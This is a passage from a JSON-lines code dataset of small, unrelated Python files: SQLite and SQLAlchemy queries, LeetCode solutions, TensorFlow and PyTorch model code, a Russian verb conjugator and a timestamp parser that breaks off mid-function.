sqlite3.connect('tutorial.db')\nc = connection.cursor()\n\nidade = int(input('digita idade '))\nnome = input('digita nome ')\n\nsql2 =\"select * from dados where keyword = ? and value = ?\"\n\ndef read_data(wordUser, aqui):\n for row in c.execute(sql2, (wordUser, aqui,)):\n print(row)\n\nread_data(nome, idade)","sub_path":"banco/sqlite_bd_select.py","file_name":"sqlite_bd_select.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422729144","text":"import torch\nfrom train_model_class import Model\n\n# Check device availability\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint(\"You are using device: %s\" % device)\n\nclass Args:\n def __init__(self, mode: str='rgb', exp_name: str=\"hmdb-test\", batch_size: int=32, length: int=32, \n learnable: str=\"[0,1,1,1,1]\", niter: int=20, system: str=\"hmdb\", model: str=\"3d\"):\n self.mode = mode\n self.exp_name = exp_name\n self.batch_size = batch_size\n self.length = length\n self.learnable = learnable\n self.niter = niter\n self.system = system\n self.model = model\n \n \n# args = Args(mode=\"rgb\", exp_name=\"hmdb-test\", batch_size=32, length=32, learnable=\"[0,1,1,1,1]\", niter=20, system=\"hmdb\", model=\"3d\")\nargs = Args()\nmodel = Model(device)\n\nmodel.train(args)\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608213881","text":"'''\nCreated on 5 déc. 2018\n\n@author: coline\n'''\nfrom audioop import max\nwith open(\"fichier_similarite_test_3.txt\", 'r') as fichier :\n ligne = \" \"\n dict = {}\n while len(ligne) != 0 :\n ligne1 = fichier.readline()\n ligne2 = fichier.readline()\n element1 = ligne1[:len(ligne1)-1]\n element2 = ligne2[:len(ligne2)-1]\n print(element1)\n print(element2)\n \n for i in range(2) :\n fichier.readline()\n \n ligne = fichier.readline()\n sim = ligne[:len(ligne)-1].split(\":\")[1]\n dict.update({(element1, element2) : sim})\n ligne = fichier.readline()\n \n print(dict)\n \n compteur = 0\n max = 0 \n pos_max = 0\n for elt in dict.keys() :\n if elt[0] == 'fichier_1FJG_A_48_8' or elt[1] == 'fichier_1FJG_A_48_8' :\n print(elt)\n print(dict[elt])\n compteur += 1\n if float(dict[elt]) > max and float(dict[elt]) < 1.0:\n max = float(dict[elt])\n pos_max = elt\n \n print(compteur)\n print(pos_max)\n print(max)\n \n \n ","sub_path":"recup.py","file_name":"recup.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312835751","text":"#!/usr/bin/env python\n#\n# Copyright 2016 luckylau \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom sqlalchemy import create_engine\nfrom neutron.db import models_v2\nfrom sqlalchemy.orm import exc\nimport sqlalchemy.orm\nimport sys\nimport db_logging\n\nDomain=\"olsodb\"\ndb_logging.rpc_log_prepare(Domain)\nLOG=db_logging.logname(__name__)\n\n_ENGINE=None\n_SESSION_MAKER=None\n\n'''Get the engine and session from sqlalchemy'''\ndef get_engine():\n global _ENGINE\n if _ENGINE is not None:\n return _ENGINE\n _ENGINE=create_engine(\"mysql+mysqldb://root:rootdb@10.0.36.176:3306/neutron\",echo=True)\n return _ENGINE\n\ndef get_session_maker(engine):\n global _SESSION_MAKER\n if _SESSION_MAKER is not None:\n return _SESSION_MAKER\n _SESSION_MAKER=sqlalchemy.orm.sessionmaker(bind=engine)\n return _SESSION_MAKER\n\n\n'''Get the session'''\ndef get_session():\n engine=get_engine()\n maker=get_session_maker(engine)\n session=maker()\n return session\n\nclass Connection(object):\n\n def __init__(self):\n pass\n def get_port(self,mac_address):\n query=get_session().query(models_v2.Port).filter_by(mac_address=mac_address)\n try:\n port_details=query.one()\n except exc.NoResultFound:\n LOG.error(\"error.....\")\n return port_details\n\ndef main():\n LOG.info(\"========main=========\")\n mac_address=\"fa:16:3e:20:37:2e\"\n connection=Connection()\n port_details=connection.get_port(mac_address)\n LOG.info(\"port_details %s\" %(port_details))\n\nif __name__ == '__main__':\n sys.exit(main())","sub_path":"openstack/sqlalchemy.orm/db_query_ports.py","file_name":"db_query_ports.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"44910764","text":"# 给定 n 个非负整数表示每个宽度为 1 的柱子的高度图,计算按此排列的柱子,下雨之后能接多少雨水。 \n# \n# \n# \n# 上面是由数组 [0,1,0,2,1,0,1,3,2,1,2,1] 表示的高度图,在这种情况下,可以接 6 个单位的雨水(蓝色部分表示雨水)。 感谢 Mar\n# cos 贡献此图。 \n# \n# 示例: \n# \n# 输入: [0,1,0,2,1,0,1,3,2,1,2,1]\n# 输出: 6 \n# Related Topics 栈 数组 双指针 \n# 👍 1505 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def trapBad(self, height: List[int]) -> int:\n \"\"\"\n 按列找 对每个柱子分别找出其左右侧最高值 时间复杂度O(n^2)\n 找左侧最大值无需单独进行一次遍历\n \"\"\"\n areas = 0\n max_left = 0\n for i in range(1, len(height) - 1):\n # max_left = 0\n # for j in range(0, i): # 与上层for同向且步长相等,可优化\n # max_left = max(height[j], max_left)\n max_left = max(max_left, height[i - 1])\n max_right = 0\n for j in range(i + 1, len(height)):\n max_right = max(height[j], max_right)\n max_lower = min(max_left, max_right)\n areas += max(max_lower - height[i], 0)\n return areas\n\n def trapGood(self, height: List[int]) -> int:\n \"\"\"\n 动态规划法 对法一找左右侧最大值的方式进行优化 时间复杂度O(n) 空间复杂度O(n)\n \"\"\"\n areas = 0\n max_right = [0] * len(height)\n max_left = 0\n # max_left = [0] * len(height)\n # for i in range(1, len(height) - 1):\n # max_left[i] = max(max_left[i - 1], height[i - 1])\n for i in range(len(height) - 2, 0, -1):\n max_right[i] = max(max_right[i + 1], height[i + 1])\n for i in range(1, len(height) - 1):\n max_left = max(max_left, height[i - 1])\n # areas += max(min(max_left[i], max_right[i]) - height[i], 0)\n areas += max(min(max_left, max_right[i]) - height[i], 0)\n return areas\n\n def trap(self, height: List[int]) -> int:\n \"\"\"\n 双指针法 结合上述两种方法 时间复杂度o(n)\n \"\"\"\n res = 0\n max_left, max_right = 0, 0\n i, j = 1, len(height) - 2\n while i <= j:\n max_left = max(max_left, height[i - 1])\n max_right = max(max_right, height[j + 1])\n if max_left < max_right:\n res += max(max_left - height[i], 0)\n i += 1\n else:\n res += max(max_right - height[j], 0)\n j -= 1\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_01/day7_[42]接雨水_homework.py","file_name":"day7_[42]接雨水_homework.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104508512","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport consts\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Label images.\",\n formatter_class=argparse.RawTextHelpFormatter)\n\nparser.add_argument(\"--images\", dest=\"images\", metavar=\"F\", type=str, default=consts.IMAGES_PATH,\n help=\"Path to images (default: %s)\" % consts.IMAGES_PATH)\n\nargs = parser.parse_args()\n\nfrom common import logger, PatchArray, Visualize\n\ndef relabel():\n # Check parameters\n if args.images == \"\" or not os.path.exists(args.images) or not os.path.isdir(args.images):\n logger.error(\"Specified path does not exist (%s)\" % args.images)\n return\n\n # Load the file\n patches = PatchArray(args.images)\n\n # Visualize\n vis = Visualize(patches, images_path=args.images)\n vis.pause = True\n vis.show()\n\nif __name__ == \"__main__\":\n relabel()\n pass","sub_path":"anomaly_detector/scripts/02_relabel.py","file_name":"02_relabel.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149577782","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 30 00:15:02 2017\n\n@author: owen\n\"\"\"\n\n#class Solution(object):\n# def matrixReshape(self, nums, r, c):\n# \"\"\"\n# :type nums: List[List[int]]\n# :type r: int\n# :type c: int\n# :rtype: List[List[int]]\n# \"\"\"\n# m=len(nums)\n# n=len(nums[0])\n# if m*n!=r*c:\n# return nums\n# # WRONG!! res=[[None]*c]*r\n# # res=[[None for _ in range(c)] for _ in range(r)]\n# res=[[None]*c for _ in range(r)]\n# for i in range(r*c):\n# res[i//c][i%c]=nums[i//n][i%n]\n# return res\n\nclass Solution:\n def matrixReshape(self, nums, r, c):\n \"\"\"\n :type nums: List[List[int]]\n :type r: int\n :type c: int\n :rtype: List[List[int]]\n \"\"\"\n m=len(nums)\n n=len(nums[0])\n if m*n!=r*c:\n return nums\n res=[[None]*c for _ in range(r)]\n row=col=0\n for i in range(m):\n for j in range(n):\n res[row][col]=nums[i][j]\n col+=1\n if col==c:\n row+=1\n col=0\n return res\n \nif __name__==\"__main__\":\n nums = [[1,2],[3,4]]\n print(Solution().matrixReshape(nums,1,4))\n print(Solution().matrixReshape(nums,2,4))\n print(Solution().matrixReshape(nums,4,1))","sub_path":"566. Reshape the Matrix.py","file_name":"566. Reshape the Matrix.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377237112","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom sys import stdin\r\n\r\nimport time\r\nfd = open('a.txt')\r\nstdin = fd\r\nstart=time.time()\r\n\r\n############################################\r\n\r\n\r\n# read data for n sequences.\r\nn = stdin.readline().split()\r\na = int(n[0])\r\nb = int(n[1])\r\nc = int(n[2])\r\n#data = [int(stdin.readline().rstrip()) for _ in range(n)]\r\n\r\nout = int(b / a)\r\n\r\nif out > c:\r\n out = c\r\n\r\nprint(out)\r\n\r\nend = time.time()\r\nprint(end-start)","sub_path":"abc123/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"150553564","text":"import tensorflow as tf\n\ndef fullyConnectedLayer(input_feature, output_dim=None, name=\"fullyConnectedLayer\"):\n with tf.variable_scope(name):\n weights = tf.get_variable(name=\"weights\", shape=[input_feature.get_shape().as_list()[1], output_dim], dtype=tf.float32, initializer=tf.random_normal_initializer(mean=0.0, stddev=0.02))\n biases = tf.get_variable(name=\"biases\", shape=[output_dim], dtype=tf.float32, initializer=tf.constant_initializer(0.0))\n return tf.matmul(input_feature, weights) + biases\n\ndef convolutionLayer(input_feature, filter_shape=None, stride_shape=None, name=\"convolutionLayer\"):\n with tf.variable_scope(name):\n weights = tf.get_variable(name=\"weights\", shape=filter_shape, dtype=tf.float32, initializer=tf.truncated_normal_initializer(mean=0.0, stddev=0.02))\n biases = tf.get_variable(name=\"biases\", shape=[filter_shape[-1]], dtype=tf.float32, initializer=tf.constant_initializer(0.0))\n z = tf.nn.conv2d(input_feature, weights, strides=stride_shape, padding=\"SAME\")\n z = tf.reshape(tf.nn.bias_add(z, biases), z.get_shape())\n return z\n\ndef transConvolutionLayer(input_feature, filter_shape=None, stride_shape=None, output_shape=None, name=\"transConvolutionLayer\"):\n with tf.variable_scope(name):\n weights = tf.get_variable(name=\"weights\", shape=filter_shape, dtype=tf.float32, initializer=tf.random_normal_initializer(mean=0.0, stddev=0.02))\n biases = tf.get_variable(name=\"biases\", shape=[output_shape[-1]], dtype=tf.float32, initializer=tf.constant_initializer(0.0))\n z = tf.nn.conv2d_transpose(input_feature, weights, output_shape=output_shape, strides=stride_shape, padding=\"SAME\")\n z = tf.reshape(tf.nn.bias_add(z, biases), z.get_shape())\n return z\n\ndef batchNormLayer(input_feature, is_training, name=\"batchNormLayer\"):\n with tf.variable_scope(name):\n return tf.contrib.layers.batch_norm(input_feature, decay=0.9, center=True, scale=True, epsilon=1e-5, updates_collections=None, is_training=is_training)\n","sub_path":"GAN/opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649237243","text":"'''\r\nCopyright (c) 2017 Leonardo MW Ltd\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software in a limited manner. Permissions to publish, distribute, sublicense or sell the Software are not granted. Permissions granted are: the rights to use, copy, modify and merge copies of the Software solely within the context of the \"Rampaging Chariots\" educational project, and subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\n\r\ndef update_line(num, data, line):\r\n line.set_data(data[..., :num])\r\n return line,\r\n\r\nfig1 = plt.figure()\r\n\r\ndata = np.random.rand(2, 25)\r\nl, = plt.plot([], [], 'r-')\r\nplt.xlim(0, 1)\r\nplt.ylim(0, 1)\r\nplt.xlabel('x')\r\nplt.title('test')\r\nline_ani = animation.FuncAnimation(fig1, update_line, 25, fargs=(data, l),\r\n interval=50, blit=True)\r\n#line_ani.save('lines.mp4')\r\n\r\nfig2 = plt.figure()\r\n\r\nx = np.arange(-9, 10)\r\ny = np.arange(-9, 10).reshape(-1, 1)\r\nbase = np.hypot(x, y)\r\nims = []\r\nfor add in np.arange(15):\r\n ims.append((plt.pcolor(x, y, base + add, norm=plt.Normalize(0, 30)),))\r\n\r\nim_ani = animation.ArtistAnimation(fig2, ims, interval=50, repeat_delay=3000,\r\n blit=True)\r\n#im_ani.save('im.mp4', metadata={'artist':'Guido'})\r\n\r\nplt.show()\r\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199210610","text":"# coding=utf-8\n\nfrom irregular_verb import *\n\ndef is_vowel(c):\n\treturn c == u'я' or c == u'е' or c == u'и' or c == u'ё' or c == u'ю' or c == u'а' or c == u'э' or c == u'ы' or c == u'о' or c == u'у'\n\ndef is_hard_vowel(c):\n\treturn c == u'а' or c == u'э' or c == u'ы' or c == u'о' or c == u'у'\n\ndef is_soft_vowel(c):\n\treturn c == u'я' or c == u'е' or c == u'и' or c == u'ё' or c == u'ю'\n\ndef soften_vowel(c):\n\tif c == u'а':\n\t\treturn u'я'\n\telif c == u'ы':\n\t\treturn u'и'\n\telif c == u'у':\n\t\treturn u'ю'\n\telse:\n\t\treturn c\n\ndef is_consonant(c):\n\treturn not is_vowel(c)\n\ndef is_consonant_exclude_yot(c):\n\treturn is_consonant(c) and c != u'й'\n\ndef count_vowels(word):\n\tcount = 0\n\tfor c in word:\n\t\tif is_vowel(c):\n\t\t\tcount += 1\n\treturn count\n\ndef first_vowel(word):\n\tfor i in range(0, len(word)):\n\t\tif is_vowel(word[i]):\n\t\t\treturn i\n\treturn -1\n\ndef last_vowel(word):\n\tfor i in range(len(word) - 1, 0, -1):\n\t\tif is_vowel(word[i]):\n\t\t\treturn i\n\treturn -1\n\ndef previous_vowel(word, pos):\n\ti = pos\n\twhile i > 0:\n\t\ti -= 1\n\t\tif is_vowel(word[i]):\n\t\t\treturn i\n\treturn pos\n\ndef last_consonant_cluster(word):\n\tif len(word) == 0 or is_consonant(word[-1]):\n\t\treturn ''\n\telse:\n\t\tstart = previous_vowel(word, len(word) - 1)\n\t\tif start == -1:\n\t\t\treturn ''\n\t\telse:\n\t\t\treturn word[start + 1:-1]\n\n\"\"\"\n0 for invalid verb stem\n1 for first conjugation\n2 for second conjugation\n\"\"\"\ndef conjugation_type(verb_stem):\n\tif len(verb_stem) < 2:\n\t\treturn 0\n\telif verb_stem[-1] == u'и' or verb_stem[-1] == u'е' or verb_stem[-2:] == u'жа' or verb_stem[-1] == u'я':\n\t\treturn 2\n\telse:\n\t\treturn 1\n\ndef is_irregular(verb_stem):\n\treturn (len(verb_stem) >= 4 and verb_stem[-4:] == u'мочь') or verb_stem == u'хотеть' or verb_stem == u'дать' or verb_stem == u'быть' or verb_stem == u'есть' or verb_stem == u'идти'\n\ndef mutate_consonant(word):\n\tif len(word) > 3 and (word[-3:] == u\"ова\" or word[-3:] == u\"ева\"):\n\t\treturn word[:-3] + u\"уй\"\n\n\tif len(word) > 4 and (word[-4:] == u\"авай\"):\n\t\treturn word[:-4] + u\"ай\"\n\n\tcluster = last_consonant_cluster(word)\n\tif len(cluster) > 0:\n\t\tif cluster[-1] == u'д' or cluster == u'г' or cluster == u'з':\n\t\t\treturn word[:-2] + u'ж' + word[-1]\n\t\telif cluster == u'т':\n\t\t\treturn word[:-2] + u'ч' + word[-1]\n\t\telif cluster == u'с':\n\t\t\treturn word[:-2] + u'ш' + word[-1]\n\t\telif cluster == u'б' or cluster == u'п':\n\t\t\treturn word[:-1] + u'л' + word[-1]\n\t\telif cluster == u'ст':\n\t\t\treturn word[:-3] + u'щ' + word[-1]\n\t\t\t\t\n\treturn word\n\ndef apply_spelling_rules(word):\n\tfor i in range(0, len(word) - 1):\n\t\tc = word[i]\n\t\tnext_c = word[i + 1]\n\t\t\n\t\t# replace ы with и after к, г, х, ш, ж, ч, and щ\n\t\tif c == u'к' or c == u'г' or c == u'х' or c == u'ш' or c == u'ж' or c == u'ч' or c == u'щ':\n\t\t\tif next_c == u'ы':\n\t\t\t\tword = word[:i + 1] + u'и' + word[i + 2:]\n\n\t\t# replace я with а and ю with у after к, г, х, ш, ж, ч, щ, and ц\n\t\tif c == u'к' or c == u'г' or c == u'х' or c == u'ш' or c == u'ж' or c == u'ч' or c == u'щ' or c == u'ц':\n\t\t\tif next_c == u'я':\n\t\t\t\tword = word[:i + 1] + u'а' + word[i + 2:]\n\t\t\telif next_c == u'ю':\n\t\t\t\tword = word[:i + 1] + u'у' + word[i + 2:]\n\n\t\t# replace unstressed о with е after ш, ж, ч, щ, and ц\n\t\tif c == u'ш' or c == u'ж' or c == u'ч' or c == u'щ' or c == u'ц':\n\t\t\tif next_c == u'о' and verb_copy.stress_pos != i + 1:\n\t\t\t\tword = word[:i + 1] + u'е' + word[i + 2:]\n\t\n\treturn word\n\ndef verb_ending(conj_type, person, singular, gender, past):\n\tif not past:\n\t\tvowel = u'ё' if (conj_type == 1) else u'и'\n\t\tvowel_3p_plural = u'у' if (conj_type == 1) else u'а'\n\t\tif person == 1:\n\t\t\tif singular:\n\t\t\t\treturn u'у'\n\t\t\telse:\n\t\t\t\treturn vowel + u'м'\n\t\telif person == 2:\n\t\t\tif singular:\n\t\t\t\treturn vowel + u'шь'\n\t\t\telse:\n\t\t\t\treturn vowel + u'те'\n\t\telif person == 3:\n\t\t\tif singular:\n\t\t\t\treturn vowel + u'т'\n\t\t\telse:\n\t\t\t\treturn vowel_3p_plural + u'т'\n\telse:\n\t\tif singular:\n\t\t\tif gender == 0:\n\t\t\t\treturn u'л'\n\t\t\telif gender == 1:\n\t\t\t\treturn u'ла'\n\t\t\telif gender == 2:\n\t\t\t\treturn u'ло'\n\t\telse:\n\t\t\treturn u'ли'\n\n\treturn ''\n\ndef add_ending(verb_stem, verb_ending):\n\tif len(verb_stem) == 0 or len(verb_ending) == 0:\n\t\treturn verb_stem + verb_ending\n\n\tlast_c_of_stem = verb_stem[-1]\n\trest_of_stem = verb_stem[:-1]\n\n\tfirst_c_of_end = verb_ending[0]\n\trest_of_end = verb_ending[1:]\n\n\tif last_c_of_stem == u'й':\n\t\tif is_hard_vowel(first_c_of_end):\n\t\t\t# yot + hard vowel = soft vowel\n\t\t\treturn rest_of_stem + soften_vowel(first_c_of_end) + rest_of_end\n\t\telif first_c_of_end == u'ё':\n\t\t\t# yot + ё = е\n\t\t\treturn rest_of_stem + u'е' + rest_of_end\n\t\telif is_consonant(first_c_of_end):\n\t\t\t# yot + consonant = consonant\n\t\t\treturn rest_of_stem + verb_ending\n\telif is_consonant(last_c_of_stem):\n\t\tif is_consonant(first_c_of_end):\n\t\t\t# consonant_1 + consonant_2 = consonant_2\n\t\t\treturn rest_of_stem + verb_ending\n\t\telse:\n\t\t\treturn verb_stem + verb_ending\n\telif is_hard_vowel(last_c_of_stem):\n\t\tif is_hard_vowel(first_c_of_end):\n\t\t\t# hard_1 + hard_2 = hard_2\n\t\t\treturn rest_of_stem + verb_ending\n\t\telif first_c_of_end == u'ё':\n\t\t\t# hard_1 + ё = е\n\t\t\treturn rest_of_stem + u'е' + rest_of_end\n\t\telse:\n\t\t\treturn verb_stem + verb_ending\n\telif is_soft_vowel(last_c_of_stem):\n\t\tif is_consonant(first_c_of_end):\n\t\t\t# soft vowel + consonant = unchanged\n\t\t\treturn verb_stem + verb_ending\n\t\telse:\n\t\t\t# soft_1 + hard_2 = soft_2\n\t\t\t# soft_1 + soft_2 = soft_2\n\t\t\treturn rest_of_stem + soften_vowel(first_c_of_end) + rest_of_end\n\ndef format_stress_mark(word):\n\tstress_pos = word.find(\"'\")\n\tif stress_pos != -1:\n\t\tif word.find(u'ё') != -1 or count_vowels(word) == 1:\n\t\t\treturn word[:stress_pos] + word[stress_pos + 1:]\n\t\telse:\n\t\t\treturn word[:stress_pos] + u'\\u0301' + word[stress_pos + 1:]\n\treturn word\n\ndef conjugate_verb(verb_stem, person, singular, gender, past, stress_type):\n\t# this check makes sure that later calls to verb_stem[-1] are valid\n\tif len(verb_stem) == 0:\n\t\treturn ''\n\n\tif is_irregular(verb_stem):\n\t\treturn conjugate_irregular_verb(verb_stem, person = person, singular = singular, gender = gender, past = past)\n\n\t# make sure stress is marked, whether explicitly (by an apostrophe) or implicitly\n\tstress_pos = verb_stem.find(\"'\")\n\tif stress_pos == -1:\n\t\tyo_pos = verb_stem.find(u'ё')\n\t\tif yo_pos != -1:\n\t\t\tstress_pos = yo_pos\n\t\telif count_vowels(verb_stem) == 1:\n\t\t\tstress_pos = first_vowel(verb_stem)\n\t\telse:\n\t\t\treturn ''\n\telse:\n\t\t# make sure stress mark is in the right place for ова- and ева- verbs with stressed endings\n\t\tif len(verb_stem) >= 4 and (verb_stem[-4:] == u\"ова'\" or verb_stem[-4:] == u\"ева'\") and not past:\n\t\t\tstress_pos = len(verb_stem) - 4\n\n\t\t# remove the stress mark, for the time being\n\t\tverb_stem = verb_stem.replace(\"'\", '')\n\n\tconj_type = conjugation_type(verb_stem)\n\tif conj_type == 0:\n\t\treturn ''\n\n\t# mutate consonant in 1p sing. non-past for 2nd conj verbs, and all non-past forms for 1st conj verbs\n\tif not past:\n\t\tif (conj_type == 2 and person == 1 and singular) or conj_type == 1:\n\t\t\tverb_stem = mutate_consonant(verb_stem)\n\n\tverb_with_ending = add_ending(verb_stem, verb_ending(conj_type, person = person, singular = singular, gender = gender, past = past))\n\n\t# apply spelling rules\n\tverb_with_ending = apply_spelling_rules(verb_with_ending)\n\n\t# consonant stems have absolute end stress in non-past\n\tif is_consonant_exclude_yot(verb_stem[-1]) and not past:\n\t\tstress_pos = last_vowel(verb_with_ending)\n\n\t# 2 indicates mobile stress\n\tif stress_type == 2:\n\t\tif is_consonant_exclude_yot(verb_stem[-1]):\n\t\t\t# consonant stems have absolute end stress in past feminine\n\t\t\tif past and gender == 1:\n\t\t\t\tstress_pos = len(verb_with_ending)\n\t\t# all other stems shift stress in all non-past forms except the first person singular\n\t\telif (person != 1 or not singular) and not past:\n\t\t\tstress_pos = previous_vowel(verb_with_ending, stress_pos - 1) + 1\n\n\t# re-insert the stress mark, if the verb does not contain the stressed letter ё\n\tif verb_with_ending.find(u'ё') == -1:\n\t\tif stress_pos == len(verb_with_ending):\n\t\t\tverb_with_ending += \"'\"\n\t\telse:\n\t\t\tverb_with_ending = verb_with_ending[:stress_pos] + \"'\" + verb_with_ending[stress_pos:]\n\n\t# change the apostrophe to a Unicode stress mark (\\u0301)\n\treturn format_stress_mark(verb_with_ending)","sub_path":"conjugate_verb.py","file_name":"conjugate_verb.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607980193","text":"# coding: utf-8\n\nimport os\nimport json\nfrom easydict import EasyDict as edict\n\ndef process_config(jsonfile=None):\n \"\"\"\n 读取json配置文件\n :param jsonfile: json配置文件名\n :return: \n \"\"\"\n try:\n if jsonfile is not None:\n with open(jsonfile, 'r') as config_file:\n config_args_dict = json.load(config_file)\n else:\n raise TypeError(\"Add a config file using file_name.json\")\n\n except FileNotFoundError:\n raise TypeError(\"ERROR: Config .json file not found\")\n except json.decoder.JSONDecodeError:\n raise TypeError(\"ERROR: Config file is not a proper JSON file!\")\n\n config_args = edict(config_args_dict)\n\n print(config_args)\n print(\"\\n\")\n\n return config_args\n","sub_path":"json_utils.py","file_name":"json_utils.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490371856","text":"import datetime\nimport json\nimport re\nimport time\n\nimport bs4\nfrom bs4 import BeautifulSoup\nfrom urllib import parse\nfrom scrapy.selector import Selector\nimport re\nimport html.entities\nfrom bs4 import BeautifulSoup as bs\nfrom urllib import parse\nfrom scrapy.selector import Selector\nimport re\nimport html.entities\nfrom bs4 import BeautifulSoup as bs\nfrom urllib import parse\nfrom scrapy.selector import Selector\ndef check_month(month):\n if month == \"January\" or month == \"Jan\":\n month = '1'\n elif month == \"February\" or month == \"Feb\":\n month = '2'\n elif month == \"March\" or month == \"Mar\":\n month = '3'\n elif month == \"April\" or month == \"Apr\":\n month = '4'\n elif month == \"May\" or month == \"May\":\n month = '5'\n elif month == \"June\" or month == \"Jun\":\n month = '6'\n elif month == \"July\" or month == \"Jul\":\n month = '7'\n elif month == \"August\" or month == \"Aug\":\n month = '8'\n elif month == \"September\" or month == \"Sep\":\n month = '9'\n elif month == \"October\" or month == \"Oct\":\n month = '10'\n elif month == \"November\" or month == \"Nov\":\n month = '11'\n elif month == \"December\" or month == \"Dec\":\n month = '12'\n return month\n\n\ndef check_day(day):\n day_int = -1\n if day == \"Monday\":\n day_int = 0\n elif day == \"Tuesday\":\n day_int = 1\n elif day == \"Wednesday\":\n day_int = 2\n elif day == \"Thursday\":\n day_int = 3\n elif day == \"Friday\":\n day_int = 4\n elif day == \"Saturday\":\n day_int = 5\n elif day == \"Sunday\":\n day_int = 6\n return day_int\ndef change_timestamp(timestamp):\n # September 25, 2018 at 7:08 PM || April 1, 2018 at 11:53 AM || November 5, 2018\n if len(timestamp.split(',')) == 2:\n year = timestamp.split(\",\")[1].split('at')[0].strip()\n month = check_month(timestamp.split(\",\")[0].split(\" \")[0].strip())\n day = timestamp.split(\",\")[0].split(\" \")[1].strip()\n if \"at\" in timestamp:\n hour = timestamp.split(\",\")[1].split('at')[1].split(\":\")[0].strip()\n minute = timestamp.split(\",\")[1].split('at')[1].split(\":\")[1].split(' ')[0].strip()\n zone = timestamp.split(\",\")[1].split('at')[1].split(\":\")[1].split(' ')[1].strip()\n if zone == \"PM\":\n hour = str(int(hour) + 12)\n if hour == \"24\":\n hour = \"00\"\n timeInt = year + \"-\" + month + \"-\" + day + \" \" + hour + \":\" + minute\n else:\n timeInt = year + \"-\" + month + \"-\" + day\n # April 15 at 12:17 PM\n elif len(timestamp.split('at')) == 2 and \"Yesterday\" not in timestamp:\n hour = timestamp.split('at')[1].split(\":\")[0].strip()\n minute = timestamp.split('at')[1].split(\":\")[1].split(\" \")[0].strip()\n try:\n zone = timestamp.split('at')[1].split(\":\")[1].split(\" \")[1].strip()\n if zone == \"PM\":\n hour = str(int(hour) + 12)\n if hour == \"24\":\n hour = \"00\"\n except:\n pass\n year = time.strftime('%Y', time.localtime(time.time()))\n day_or_month = timestamp.split('at')[0].split(' ')[0].strip()\n check_day_or_month = check_day(day_or_month)\n if check_day_or_month > -1:\n day_sub = datetime.date.today().weekday() - check_day_or_month\n year_month_day = datetime.date.today() - datetime.timedelta(day_sub)\n timeInt = str(year_month_day) + \" \" + hour + \":\" + minute\n else:\n try:\n int(day_or_month)\n # 2 July\n month = timestamp.split('at')[0].split(' ')[1].strip()\n month = check_month(month)\n day = timestamp.split('at')[0].split(' ')[0].strip()\n except:\n # July 23\n month = check_month(day_or_month)\n day = timestamp.split('at')[0].split(' ')[1].strip()\n timeInt = year + \"-\" + month + \"-\" + day + \" \" + hour + \":\" + minute\n # 10 hrs\n elif 'hrs' in timestamp or 'hr' in timestamp:\n hour_temp = timestamp.split(' ')[0]\n timeInt = (datetime.datetime.now() - datetime.timedelta(hours=int(hour_temp))).strftime('%Y-%m-%d %H:%M')\n # 30 mins\n elif 'mins' in 